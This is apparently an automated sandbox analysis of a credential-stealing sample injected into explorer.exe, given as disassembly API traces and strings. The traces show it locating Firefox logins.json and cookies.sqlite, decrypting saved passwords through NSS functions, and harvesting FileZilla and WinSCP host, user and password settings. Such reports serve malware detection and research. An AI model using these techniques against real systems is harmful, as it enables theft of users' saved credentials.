                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle
                                                        • String ID:
                                                        • API String ID: 3498533004-0
                                                        • Opcode ID: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
                                                        • Instruction ID: 54c4544992f8f1923c99968fc4dc665176b3479511f2df21b352beb30d5b6e3c
                                                        • Opcode Fuzzy Hash: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
                                                        • Instruction Fuzzy Hash: E8D0C771203230A2E5B923353D0CFEB2E6CDF03AB1F054618B60CD44D0E3218D8386E0
                                                        APIs
                                                        • HeapFree.KERNEL32(02660000,00000000,?), ref: 000C9EF8
                                                        Strings
                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 000C9F0E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                        • API String ID: 3298025750-4030396798
                                                        • Opcode ID: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
                                                        • Instruction ID: f2441149ca70ee939b8fe1d96a8109030f2138eee9c13a8f6c809ff235a10f20
                                                        • Opcode Fuzzy Hash: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
                                                        • Instruction Fuzzy Hash: CFD01276508241BBD6119B54AC45F2F77B9ABA5B00F44042CF104964A6D37554A3AB71
                                                        APIs
                                                          • Part of subcall function 000C1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 000C116F
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                        • String ID:
                                                        • API String ID: 2580854192-0
                                                        • Opcode ID: de5627ba02caadd833ba805bc2f845dac91f4491ec6113c940ec8d7d141d6c5f
                                                        • Instruction ID: bcd070ed24b4e4b53dfca3b274ede6127fbd012df32622d5fde6b25995508891
                                                        • Opcode Fuzzy Hash: de5627ba02caadd833ba805bc2f845dac91f4491ec6113c940ec8d7d141d6c5f
                                                        • Instruction Fuzzy Hash: FAC04C7144526066C9A427A47E0DFCE2B59DF8B262F094445B90597553CAA68C8186A0
                                                        APIs
                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryZero
                                                        • String ID:
                                                        • API String ID: 816449071-0
                                                        • Opcode ID: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
                                                        • Instruction ID: 7d68ba4ea28ba266cf2c5d120ee712bc90d8f352e3f6c553bbf1d70295c067c7
                                                        • Opcode Fuzzy Hash: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
                                                        • Instruction Fuzzy Hash: 7511E3B5A01209AFDB24DFA9E984EEEB7FCEB49341B104029F945E6241D7319A40CB60
                                                        APIs
                                                        • GetFileAttributesExW.KERNELBASE(00000000,00000000,?,?,00000000,-00080006), ref: 000CB848
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: c993734bedfbb6c6cd0e16370fbda6d121d01291b9820c922acbeea7a866fb41
                                                        • Instruction ID: d8df1341db1b2fccc899c72ee4e2b0084aab087b427d893dc35d4851c4450dcb
                                                        • Opcode Fuzzy Hash: c993734bedfbb6c6cd0e16370fbda6d121d01291b9820c922acbeea7a866fb41
                                                        • Instruction Fuzzy Hash: E9F06231A0421CAADB209BBE9C45FEEF7ECDB49768F104229F915F2091EB7089098691
                                                        APIs
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000C1684
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID:
                                                        • API String ID: 2244384528-0
                                                        • Opcode ID: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
                                                        • Instruction ID: 05cf46aa160d6539f5a83fde185778d3e14ae09a92089202867549f6638f93f9
                                                        • Opcode Fuzzy Hash: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
                                                        • Instruction Fuzzy Hash: DAC012301202219EE7601B209D09BCA36D8AF1A7A2F060929A081990C0E2F508C08A90
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,000C158A), ref: 000C1056
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
                                                        • Instruction ID: 6ced8ba81a80a37abd1a230f096ca294a1d38799ad107e7e8dc3420ce8496934
                                                        • Opcode Fuzzy Hash: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
                                                        • Instruction Fuzzy Hash: 61A002F07D67007AFD6D5762AF1FF5529389744F02F114244B34D7C4D095E97540852D
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,000C4A5B,?,?,00000000,?,?,?,?,000C4B66,?), ref: 000C1065
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
                                                        • Instruction ID: ea9c58852240352b8423ea4b75abe92339e5d7fb28c36c6259098a70c275598b
                                                        • Opcode Fuzzy Hash: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
                                                        • Instruction Fuzzy Hash: F4A0027069070076EDB857205E0AF4526146780B01F2185447641A94D18AA6E084CA18
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C34C0
                                                          • Part of subcall function 000C33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 000C3401
                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,000C37A8), ref: 000C34E9
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C351E
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C3541
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 000C3586
                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 000C358F
                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 000C35B6
                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 000C35DE
                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C35F6
                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C3606
                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 000C361E
                                                        • GetFileSize.KERNEL32(?,00000000), ref: 000C3631
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 000C3658
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 000C366B
                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C3681
                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 000C36AD
                                                        • CloseHandle.KERNEL32(?), ref: 000C36C0
                                                        • CloseHandle.KERNEL32(00000000), ref: 000C36F5
                                                          • Part of subcall function 000C1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 000C1CC0
                                                          • Part of subcall function 000C1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 000C1CDA
                                                          • Part of subcall function 000C1C9F: CloseHandle.KERNEL32(00000000), ref: 000C1CE6
                                                        • CloseHandle.KERNEL32(?), ref: 000C3707
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                        • String ID: File
                                                        • API String ID: 3915112439-749574446
                                                        • Opcode ID: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
                                                        • Instruction ID: e611380c84b8e800ad77419bd56dca3311fb691ad2757330bb5d87bb6a9d9bac
                                                        • Opcode Fuzzy Hash: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
                                                        • Instruction Fuzzy Hash: 30619370214300BFD7649F20CC85FAFBBE9EB88754F10892CF946D62A2D776DA848B51
                                                        APIs
                                                        • memcmp.NTDLL ref: 00114502
                                                        • memcmp.NTDLL ref: 0011475F
                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00114803
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcmp$memcpy
                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                        • API String ID: 231171946-1096842476
                                                        • Opcode ID: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
                                                        • Instruction ID: 0ae4a5864ec2897dd920d3a381ff2996a0ff21590144861ef0922d2565c29d7a
                                                        • Opcode Fuzzy Hash: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
                                                        • Instruction Fuzzy Hash: 18C1E4719083519BDB3CCF188490BFAB7D2AB9AB18F14053EF4D587292D724D8C5C796
                                                        APIs
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 000C2B3D
                                                        • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C2B63
                                                        • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C2B7B
                                                          • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 000C2BE7
                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 000C2C16
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C2C43
                                                        • FindClose.KERNEL32(00000000), ref: 000C2C52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                        • API String ID: 1108783765-3717368146
                                                        • Opcode ID: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
                                                        • Instruction ID: aafc04bb5f71a56d0c688c2381e3aaf9193852b0c09fd3335d0131dcf12101ad
                                                        • Opcode Fuzzy Hash: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
                                                        • Instruction Fuzzy Hash: 283190303043055BCB18AB709995FFE73DAAB89700B14893CB845D3693EF7ACD869252
                                                        APIs
                                                          • Part of subcall function 000C6AAA: memset.NTDLL ref: 000C6AC5
                                                        • memset.NTDLL ref: 000E5F53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                        • API String ID: 2221118986-594550510
                                                        • Opcode ID: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
                                                        • Instruction ID: 5d15dc0e707e90713246ede4f2e4703f2becd81512558dd9c05cf51217637031
                                                        • Opcode Fuzzy Hash: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
                                                        • Instruction Fuzzy Hash: 7DC1AD706087429FCB54DF26D480A6FB7E2BFD8740F04892DF855A7242DB32E956CB92
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 000C2127
                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 000C213A
                                                        • wsprintfA.USER32 ref: 000C214F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                        • String ID: %li
                                                        • API String ID: 4120667308-1021419598
                                                        • Opcode ID: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
                                                        • Instruction ID: 87b622b6f1c7054b961d268ef61acbadafc26ef617cff2d966bd51cf342a7809
                                                        • Opcode Fuzzy Hash: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
                                                        • Instruction Fuzzy Hash: 22E0D83264121877C7243BB89D06FEF7B6DDB80B55F004195F900E2586E6738AA483D5
                                                        APIs
                                                        • CoCreateInstance.OLE32(001162B0,00000000,00000001,001162A0,?), ref: 000C445F
                                                        • SysAllocString.OLEAUT32(?), ref: 000C44AA
                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 000C456E
                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 000C457D
                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 000C458C
                                                          • Part of subcall function 000C11E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,000C46E3), ref: 000C11ED
                                                          • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C120F
                                                          • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1231
                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 000C45BE
                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 000C45CD
                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 000C4657
                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 000C4679
                                                        • lstrcmpiW.KERNEL32(User,?), ref: 000C469F
                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 000C46C5
                                                        • wsprintfW.USER32 ref: 000C471E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                        • API String ID: 2230072276-1234691226
                                                        • Opcode ID: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
                                                        • Instruction ID: e843122c189cc5930bf12067dc9b5f1d3e7ad64f530fa00f5a5b4f521c672ced
                                                        • Opcode Fuzzy Hash: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
                                                        • Instruction Fuzzy Hash: 1BB1F571208302AFD744DF64C894F6AB7E9BF89745F00896CF5858B261DB72E846CB62
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                          • Part of subcall function 000C1090: lstrlenW.KERNEL32(?,?,00000000,000C17E5), ref: 000C1097
                                                          • Part of subcall function 000C1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000C10A8
                                                          • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 000C2503
                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 000C250A
                                                        • LoadLibraryW.KERNEL32(00000000), ref: 000C2563
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2570
                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 000C2591
                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 000C259E
                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000C25AB
                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000C25B8
                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000C25C5
                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000C25D2
                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000C25DF
                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                        • API String ID: 3366569387-3272982511
                                                        • Opcode ID: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
                                                        • Instruction ID: f27eb7f9fdc0b117fc65d383f015153ce6af75afbe9925de09a55da9ba8c9da4
                                                        • Opcode Fuzzy Hash: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
                                                        • Instruction Fuzzy Hash: A3414835A00315ABCB28EF349D54FEE7AE59B96740B10003EF851D3AA3DB758C878B61
                                                        APIs
                                                          • Part of subcall function 000C5BF5: memset.NTDLL ref: 000C5C07
                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C60E1
                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C60EC
                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 000C6113
                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C618E
                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C61B5
                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C61C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _alldiv$_allrem$memset
                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                        • API String ID: 2557048445-1989508764
                                                        • Opcode ID: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                        • Instruction ID: 502cfbf67b18a962bf2db5a4d44a48d6e4ebfb69120bd35f6eeed1c98243c828
                                                        • Opcode Fuzzy Hash: 07b6f24c9f0eccf547c5febb05cd4f55052b92d10405f92d4ab388aa2304a2eb
                                                        • Instruction Fuzzy Hash: 8CB182B1908B42ABD7399F24CC85F7F7FD4EB80344F24066DF482A62D2E722DD918691
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcmp
                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                        • API String ID: 1475443563-3683840195
                                                        • Opcode ID: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                        • Instruction ID: fe290169e0ce38446e0540a888359f41ab26a7e6bb3f0bce88348ddb2ddbfa1c
                                                        • Opcode Fuzzy Hash: 6c12060513ba6a234d0862b8537c34ffa40511fdd26cf7abd0e86ff22dfed634
                                                        • Instruction Fuzzy Hash: 5E51DF31508700ABC7649F64CC91AABB7E6EB45300F14487FF9969B382E771ED45CBA2
                                                        APIs
                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C2AD2
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000C29E1
                                                        • lstrlen.KERNEL32(00000000), ref: 000C29EC
                                                        • wsprintfA.USER32 ref: 000C2A38
                                                        • lstrlen.KERNEL32(00000000), ref: 000C2A44
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000C2A6C
                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 000C2A99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                        • API String ID: 304071051-2605711689
                                                        • Opcode ID: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                        • Instruction ID: 6590630dc8a207623c16ac02fe2defee39dcf0182e8ea07b300ef6e5e98ee674
                                                        • Opcode Fuzzy Hash: b6fbec5da11f4ddb5932563bba272f676d001bde523c1f2972690ab1abefcc36
                                                        • Instruction Fuzzy Hash: 3F519E306083469BC729EF209851FBE77EAAF8A704F04482DF8859B653DB36DC458752
                                                        APIs
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 000C2D13
                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 000C2D45
                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,0011637C,?,00000FFF,?), ref: 000C2D68
                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 000C2D7B
                                                        • lstrlenW.KERNEL32(00000000), ref: 000C2DD8
                                                        Similarity
                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                        • API String ID: 2234428054-4107377610
                                                        APIs
                                                          • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                          • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                          • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4845
                                                          • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C488F
                                                          • Part of subcall function 000C482C: lstrlenW.KERNEL32(?), ref: 000C4897
                                                        • wsprintfW.USER32 ref: 000C49A7
                                                        • wsprintfW.USER32 ref: 000C49B9
                                                        Similarity
                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                        • API String ID: 2889301010-4273187114
                                                        APIs
                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 000CFB32
